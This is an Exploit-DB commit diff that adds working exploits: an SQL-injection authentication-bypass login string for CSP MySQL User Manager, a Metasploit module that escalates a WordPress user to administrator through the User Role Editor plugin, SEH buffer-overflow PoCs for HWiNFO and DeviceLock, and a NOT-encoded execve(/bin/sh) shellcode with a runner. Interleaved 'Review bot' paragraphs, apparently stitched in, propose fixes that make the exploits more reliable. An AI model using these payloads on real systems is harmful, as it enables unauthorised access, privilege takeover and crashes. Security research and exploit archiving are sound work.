DB: 2018-05-07

11 changes to exploits/shellcodes

HWiNFO 5.82-3410 - Denial of Service

DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)
CSP MySQL User Manager 2.3.1 - Authentication Bypass
WordPress Plugin User Role Editor < 4.25 - Privilege Escalation

Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes)
This commit is contained in:
Offensive Security 2018-05-07 05:01:44 +00:00
parent 39c7c53159
commit a066ef9212
13 changed files with 401 additions and 12 deletions

@ -0,0 +1,41 @@
# Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass
# Date: 2018-05-04
# Exploit Author: Youssef mami
# Vendor Homepage: https://code.google.com/archive/p/cspmum/
# Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
# Version: 2.3.1
# Tested on: Linux 2.6.38-11
# CVE : CVE-2018-10757
##################################################################################
.__ __
| |__ _____ _____ _____ _____ _____ _____/ |_
| | \\__ \ / \ / \\__ \ / \_/ __ \ __\
| Y \/ __ \| Y Y \ Y Y \/ __ \| Y Y \ ___/| |
|___| (____ /__|_| /__|_| (____ /__|_| /\___ >__|
\/ \/ \/ \/ \/ \/ \/
.__ _____ __ .__
|__| _____/ ____\___________ _____ _____ _/ |_|__| ________ __ ____
| |/ \ __\/ _ \_ __ \/ \\__ \\ __\ |/ ____/ | \_/ __ \
| | | \ | ( <_> ) | \/ Y Y \/ __ \| | | < <_| | | /\ ___/
|__|___| /__| \____/|__| |__|_| (____ /__| |__|\__ |____/ \___ >
\/ \/ \/ |__| \/
.__
______ ______________ _|__| ____ ____ ______
/ ___// __ \_ __ \ \/ / |/ ___\/ __ \ / ___/
\___ \\ ___/| | \/\ /| \ \__\ ___/ \___ \
/____ >\___ >__| \_/ |__|\___ >___ >____ >
\/ \/ \/ \/ \/
##################################################################################
SQL Injection Authentication Bypass
Product Page: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
Author(Pentester): Youssef mami (contact@hammamet-services.com)
On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog )
On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
##################################################################################
we just need to input admin login like this : admin' or ' 1=1-- and any password :-)
login : admin' or ' 1=1--
password: hammamet informatique services
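Review bot: the advisory never names the script or the SQL statement into which the login value is concatenated, nor whether a fixed release exists, so a defender cannot locate or verify the bug; add the affected file/query and a remediation line (bind the login and password as parameters instead of building the query from the raw POST values). Two header nits: "Product Page" on the line starting `Product Page: https://storage.googleapis.com/...` repeats the Software Link download zip rather than the project page already given under Vendor Homepage, and "Tested on: Linux 2.6.38-11" is a kernel version that says nothing about the web stack the bug lives in.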

@ -3,8 +3,8 @@
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/olimometer/
# Software Link: https://wordpress.org/plugins/olimometer/
# Contact: info@tad.bg
# Website: http://tad.bg <https://tad.bg/en/>
# Contact: info@tad.group
# Website: https://tad.group
# Category: Web Application Exploits
# Tested on: Debian 8

@ -3,8 +3,8 @@
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
# Software Link: https://wordpress.org/plugins/simply-poll/
# Contact: info@tad.bg
# Website: http://tad.bg <http://tad.bg/>
# Contact: info@tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1 - Description

@ -4,8 +4,8 @@
# Vendor Homepage: https://wordpress.org/plugins-wp/kittycatfish/
# Software Link: https://wordpress.org/plugins-wp/kittycatfish/
# Version: 2.2
# Contact: info@tad.bg
# Website: https://tad.bg <https://tad.bg>
# Contact: info@tad.group
# Website: https://tad.group
# Category: Web Application Exploits

@ -4,8 +4,8 @@
# Vendor Homepage: https://www.bestsoftinc.com/
# Software Link: https://www.bestsoftinc.com/car-rental-system.html
# Version: 2.5
# Contact: info@tad.bg
# Website: https://tad.bg <https://tad.bg>
# Contact: info@tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1. Description

@ -4,8 +4,8 @@
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-viral-signup/
# Version: 2.1
# Contact: info@tad.bg
# Website: https://tad.bg <https://tad.bg>
# Contact: info@tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1. Description

@ -4,8 +4,8 @@
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-forms/
# Version: 2.1
# Contact: info@tad.bg
# Website: https://tad.bg <https://tad.bg>
# Contact: info@tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1. Description

exploits/php/webapps/44595.rb Executable file
@ -0,0 +1,174 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress User Role Editor Plugin Privilege Escalation',
'Description' => %q{
The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization
check within its update user profile functionality ("update" function, contained
within the "class-user-other-roles.php" module).
Instead of verifying whether the current user has the right to edit other users'
profiles ("edit_users" WP capability), the vulnerable function verifies whether the
current user has the rights to edit the user ("edit_user" WP function) specified by
the supplied user id ("user_id" variable/HTTP POST parameter). Since the supplied
user id is the current user's id, this check is always bypassed (i.e. the current
user is always allowed to modify its profile).
This vulnerability allows an authenticated user to add arbitrary User Role Editor
roles to its profile, by specifying them via the "ure_other_roles" parameter within
the HTTP POST request to the "profile.php" module (issued when "Update Profile" is
clicked).
By default, this module grants the specified WP user all administrative privileges,
existing within the context of the User Role Editor plugin.
},
'Author' =>
[
'ethicalhack3r', # Vulnerability discovery
'Tomislav Paskalev' # Exploit development, metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '8432'],
['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
],
'DisclosureDate' => 'Apr 05 2016',
))
register_options(
[
OptString.new('TARGETURI', [true, 'URI path to WordPress', '/']),
OptString.new('ADMINPATH', [true, 'wp-admin directory', 'wp-admin/']),
OptString.new('CONTENTPATH', [true, 'wp-content directory', 'wp-content/']),
OptString.new('PLUGINSPATH', [true, 'wp plugins directory', 'plugins/']),
OptString.new('PLUGINPATH', [true, 'User Role Editor directory', 'user-role-editor/']),
OptString.new('USERNAME', [true, 'WordPress username']),
OptString.new('PASSWORD', [true, 'WordPress password']),
OptString.new('PRIVILEGES', [true, 'Desired User Role Editor privileges', 'activate_plugins,delete_others_pages,delete_others_posts,delete_pages,delete_posts,delete_private_pages,delete_private_posts,delete_published_pages,delete_published_posts,edit_dashboard,edit_others_pages,edit_others_posts,edit_pages,edit_posts,edit_private_pages,edit_private_posts,edit_published_pages,edit_published_posts,edit_theme_options,export,import,list_users,manage_categories,manage_links,manage_options,moderate_comments,promote_users,publish_pages,publish_posts,read_private_pages,read_private_posts,read,remove_users,switch_themes,upload_files,customize,delete_site,create_users,delete_plugins,delete_themes,delete_users,edit_plugins,edit_themes,edit_users,install_plugins,install_themes,unfiltered_html,unfiltered_upload,update_core,update_plugins,update_themes,ure_create_capabilities,ure_create_roles,ure_delete_capabilities,ure_delete_roles,ure_edit_roles,ure_manage_options,ure_reset_roles'])
])
end
# Detect the vulnerable plugin by enumerating its readme.txt file
def check
readmes = ['readme.txt', 'Readme.txt', 'README.txt']
res = nil
readmes.each do |readme_name|
readme_url = normalize_uri(target_uri.path, datastore['CONTENTPATH'], datastore['PLUGINSPATH'], datastore['PLUGINPATH'], readme_name)
vprint_status("Checking #{readme_url}")
res = send_request_cgi(
'uri' => readme_url,
'method' => 'GET'
)
break if res && res.code == 200
end
if res.nil? || res.code != 200
# The readme.txt file does not exist
return Msf::Exploit::CheckCode::Unknown
end
version_res = extract_and_check_version(res.body.to_s, :readme, 'plugin', '4.25', nil)
return version_res
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
# Search for specified data within the provided HTTP response
def check_response(res, name, regex)
res.body =~ regex
result = $1
if result
print_good("#{peer} - WordPress - Getting data - #{name}")
else
vprint_error("#{peer} #{res.body}")
fail_with("#{peer} - WordPress - Getting data - Failed (#{name})")
end
return result
end
# Run the exploit
def run
# Check if the specified target is running WordPress
fail_with("#{peer} - WordPress - Not Found") unless wordpress_and_online?
# Authenticate to WordPress
print_status("#{peer} - WordPress - Authentication - #{username}:#{password}")
cookie = wordpress_login(username, password)
fail_with("#{peer} - WordPress - Authentication - Failed") if cookie.nil?
store_valid_credential(user: username, private: password, proof: cookie)
print_good("#{peer} - WordPress - Authentication - OK")
# Get additional information from WordPress, required for the HTTP POST request (anti-CSRF tokens, user parameters)
url = normalize_uri(wordpress_url_backend, 'profile.php')
print_status("#{peer} - WordPress - Getting data - #{url}")
res = send_request_cgi({
'method' => 'GET',
'uri' => url,
'cookie' => cookie
})
if res and res.code == 200
wp_nonce = check_response(res, "_wpnonce", /name=\"_wpnonce\" value=\"(.+?(?=\"))\"/)
color_nonce = check_response(res, "color-nonce", /name=\"color-nonce\" value=\"(.+?(?=\"))\"/)
checkuser_id = check_response(res, "checkuser_id", /name=\"checkuser_id\" value=\"(.+?(?=\"))\"/)
nickname = check_response(res, "nickname", /name=\"nickname\" id=\"nickname\" value=\"(.+?(?=\"))\"/)
display_name = check_response(res, "display_name", /name=\"display_name\" id=\"display_name\"\>[\s]+\<option selected=\'selected\'\>(.+?(?=\<))\</)
email = check_response(res, "email", /name=\"email\" id=\"email\" value=\"(.+?(?=\"))\"/)
user_id = check_response(res, "user_id", /name=\"user_id\" id=\"user_id\" value=\"(.+?(?=\"))\"/)
else
fail_with("#{peer} - WordPress - Getting data - Server response (code #{res.code})")
end
# Send HTTP POST request - update the specified user's privileges
print_status("#{peer} - WordPress - Changing privs - #{username}")
res = send_request_cgi({
'method' => 'POST',
'uri' => url,
'vars_post' => {
'_wpnonce' => wp_nonce,
'_wp_http_referer' => URI::encode(url),
'from' => 'profile',
'checkuser_id' => checkuser_id,
'color-nonce' => color_nonce,
'admin_color' => 'fresh',
'admin_bar_front' => '1',
'first_name' => '',
'last_name' => '',
'nickname' => nickname,
'display_name' => display_name,
'email' => email,
'url' => '',
'description' => '',
'pass1' => '',
'pass2' => '',
'ure_other_roles' => datastore['PRIVILEGES'],
'action' => 'update',
'user_id' => user_id,
'submit' => 'Update+Profile'
},
'cookie' => cookie
})
# check outcome
if res and res.code == 302
print_good("#{peer} - WordPress - Changing privs - OK")
else
fail_with("#{peer} - WordPress - Changing privs - Server response (code #{res.code})")
end
end
end
# EoF
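Review bot: both error branches dereference `res` after the guard that allows it to be nil has already failed: the `else` of `if res and res.code == 200` and the `else` of `if res and res.code == 302` each call `fail_with("... Server response (code #{res.code})")`, which raises NoMethodError on a timeout or dropped connection instead of the intended message; use `res.nil? ? 'no response' : res.code` (or `res&.code`) in both. `URI::encode(url)` in the `_wp_http_referer` value relies on the long-deprecated `URI.encode`, which is removed in Ruby 3; `URI.encode_www_form_component(url)` or the framework's own `Rex::Text.uri_encode` is the safe replacement. Minor: `check_response` leaves the match in the global `$1`, which is fine here but would be clearer as `m = res.body.match(regex); result = m && m[1]`.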

exploits/windows/dos/44593.py Executable file
@ -0,0 +1,39 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: HWiNFO 5.82-3410 - Denial of Service
# Date: 05-04-18
# Vulnerable Software: HWiNFO 5.82-3410
# Vendor Homepage: https://www.hwinfo.com/
# Version: 5.82-3410
# Software Link: https://www.hwinfo.com/files/hwi_582.exe
# Tested On: Windows 7 x86
#
# PoC:
# 1. generate hwinfo.txt, copy contents to clipboard
# 2. open app, select Report, Create
# 3. choose Export format XML
# 4. paste hwinfo.txt contents into filename field
# 5. select Next, Next
#
# app crashes & EIP overwrite;
# !mona seh > only ppr, non-safeseh module contains startnull
# 0x00400000 | 0x00d8b000 | 0x0098b000 | 5.82-3410 [HWiNFO32.EXE] (C:\Program Files\HWiNFO32\HWiNFO32.EXE)
#
filename="hwinfo.txt"
#offset 530
junk = "A"*526
seh = "B"*4
nseh = "C"*4
fill = "D"*9465
buffer = junk + seh + nseh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
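Review bot: the two 4-byte markers are named in the wrong order for the layout the comment describes. In an SEH record the next-SEH pointer comes first and the handler address follows it, so at `#offset 530` the `"B"*4` placed at 526 is the nSEH field and the `"C"*4` at 530 is the handler that ends up in EIP; either swap the `seh`/`nseh` names or state in the comment which marker was observed in the handler slot, since the `!mona seh` note only says an overwrite occurred. Also prefer `with open(filename, 'w') as textfile:` so the file is flushed even if the write fails.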

@ -0,0 +1,85 @@
# Exploit Title: DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)
# Date: 2018-05-04
# Exploit Author: Youssef mami
# Vendor Homepage: https://www.devicelock.com/freeware.html/
# Version: 5.72
# CVE : CVE-2018-10655
# Security Issue:
DeviceLock Plug and Play Auditor "DLPnpAuditor.exe" is vulnerable to a Unicode type of buffer overflow, when supplied a specially crafted textfile using the "scan network" from file option.
The buffer overload payload will get converted to unicode character encoding. Unicode support is used by applications for internationalization purposes allowing a consistent way to visually
represent different character sets on most systems around the world.
e.g.
Before our buffer overflow payload was put on the stack it was expanded with 0x00 so "RRRR" transforms to Unicode representation of "00520052"
(52 is HEX for Ascii char R) containing 0's (NULL) values. Therefore, attempting to exploit the vulnerable program needs an unicode compatiable address
(address with null bytes) and using encoding methods like "alpha2" encoder tool.
Stack dump:
SEH chain of main thread
Address SE handler
0018EE00 ntdll.771B34DD
0018FBD4 00520052
00520052 A42F0000
E5C1411F *** CORRUPT ENTRY ***
EAX 00000000
ECX 00520052
EDX 771B34DD ntdll.771B34DD
EBX 00000000
ESP 0018EDEC
EBP 0018EE0C
ESI 00000000
EDI 00000000
EIP 00520052
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
# Exploit/POC:
1) Create POC textfile
2) Under File menu "Scan Network" choose "From file" under drop down menu.
3) Choose the exploit file select the Scan "Domain" box and run it.
#Unicode SEH Buffer Overflow
#https://www.devicelock.com/download/
PAYLOAD="A"*1036+"R"*8+"B"*56 #Control SEH
file=open("devicelock-bof.txt","w")
file.write(PAYLOAD)
file.close()
print 'DeviceLock Plug and Play Auditor v5.72 (freeware)'
print 'Exploit POC file created.'
print 'hyp3rlinx'
# Disclosure Timeline:
Vendor Notification: April 17, 2018
No reply
Vendor Notification: April 22, 2018
No reply
May 6, 2018 : Public Disclosure
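Review bot: the PoC body uses Python 2 `print` statements (`print 'DeviceLock Plug and Play Auditor v5.72 (freeware)'` and the two lines after it), so the file fails to parse under Python 3; wrap them as `print(...)`, and use `with open(...)` for the file write. The register and FPU dump from `EAX 00000000` down to `FCW 027F ...` is debugger residue that adds nothing beyond the SEH chain lines showing `00520052`; trim it to the SEH chain and EIP. The `Vendor Homepage` URL `https://www.devicelock.com/freeware.html/` carries a stray trailing slash after `.html`, and "compatiable" in the description should read "compatible".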

@ -5965,6 +5965,7 @@ id,file,description,date,author,type,platform,port
44566,exploits/multiple/dos/44566.html,"WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free",2018-05-02,"Google Security Research",dos,multiple,
44572,exploits/windows/dos/44572.txt,"Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service",2018-05-02,"Tenable NS",dos,windows,
44579,exploits/linux/dos/44579.c,"Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux,
44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9701,6 +9702,7 @@ id,file,description,date,author,type,platform,port
44573,exploits/windows/local/44573.txt,"Adobe Reader PDF - Client Side Request Injection",2018-05-02,"Alex Inführ",local,windows,
44581,exploits/windows/local/44581.c,"Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows,
44586,exploits/windows_x86-64/local/44586.rb,"Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64,
44590,exploits/windows/local/44590.txt,"DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)",2018-05-06,hyp3rlinx,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
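Review bot: the new row `44590,exploits/windows/local/44590.txt,...,hyp3rlinx,local,windows,` credits hyp3rlinx, but the 44590.txt header added in this same commit lists `Exploit Author: Youssef mami` while its PoC prints `hyp3rlinx`; reconcile the author field in the text file and the CSV before merging so the index and the advisory agree.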
@ -39280,3 +39282,5 @@ id,file,description,date,author,type,platform,port
44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple,
44585,exploits/php/webapps/44585.txt,"WordPress Plugin WF Cookie Consent 1.1.3 - Cross-Site Scripting",2018-05-04,B0UG,webapps,php,
44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php,
44589,exploits/linux/webapps/44589.txt,"CSP MySQL User Manager 2.3.1 - Authentication Bypass",2018-05-06,"Youssef Mami",webapps,linux,
44595,exploits/php/webapps/44595.rb,"WordPress Plugin User Role Editor < 4.25 - Privilege Escalation",2018-05-06,"Tomislav Paskalev",webapps,php,

@ -880,3 +880,4 @@ id,file,description,date,author,type,platform
44509,shellcodes/linux_x86/44509.c,"Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)",2018-04-24,absolomb,shellcode,linux_x86
44510,shellcodes/linux_x86/44510.c,"Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86
44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
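Review bot: the description in the new row, "execve(/bin/sh) NOT Encoded Shellcode (27 bytes)", reads as "not encoded" although the source file's title is "Execve /bin/sh Shellcode encoded with NOT"; hyphenate it as "NOT-Encoded" (or "Bitwise-NOT Encoded") so the index matches the sibling entry "ROT-13 + RShift-2 + XOR Encoded" and is not misread.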

@ -0,0 +1,45 @@
/*
; Title : Execve /bin/sh Shellcode encoded with NOT
; Date : May, 2018
; Author : Nuno Freitas
; Twitter : @nunof11
; SLAE ID : SLAE-1112
; Size : 27 bytes
; Tested on : i686 GNU/Linux
section .text
global _start
_start:
xor ecx, ecx
mul ecx
push ecx
; instructions to avoid having the strings "nib/" and "hs//" pushed directly
mov edi, 0x978CD0D0
mov esi, 0x91969DD0
not edi
not esi
push edi
push esi
mov ebx, esp
mov al, 0xb
int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80";
void main()
{
printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}
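Review bot: the C harness has three portability defects: `void main()` is not a valid signature (use `int main(void)` and `return 0;`), `strlen(shellcode)` is passed an `unsigned char *` and warns on every compiler (cast to `(const char *)`), and `%d` with the `size_t` result should be `%zu`. In the assembly listing, a comment that `mul ecx` clears both eax and edx would help readers, since edx is the `envp` argument to execve and the code relies on it being NULL; it would also be worth stating that the two NOT-decoded immediates push "/bin" and "//sh", which is what the encoded bytes `\xd0\xd0\x8c\x97` and `\xd0\x9d\x96\x91` decode to.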